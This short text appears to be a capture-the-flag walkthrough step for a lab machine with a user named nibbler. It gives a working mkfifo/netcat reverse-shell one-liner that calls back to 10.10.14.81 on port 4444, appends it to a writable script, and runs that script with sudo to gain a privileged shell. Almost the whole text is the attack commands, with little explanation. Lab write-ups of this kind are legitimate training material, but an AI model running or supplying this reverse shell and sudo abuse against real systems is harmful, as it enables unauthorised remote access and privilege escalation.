April 01, 2024
Last updated 1 year ago
append this reverse shell to monitor.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.81 4444 >/tmp/f' | tee -a monitor.sh
Then just run the command you will get the reverse connection to your attacker box
sudo /home/nibbler/personal/stuff/monitor.sh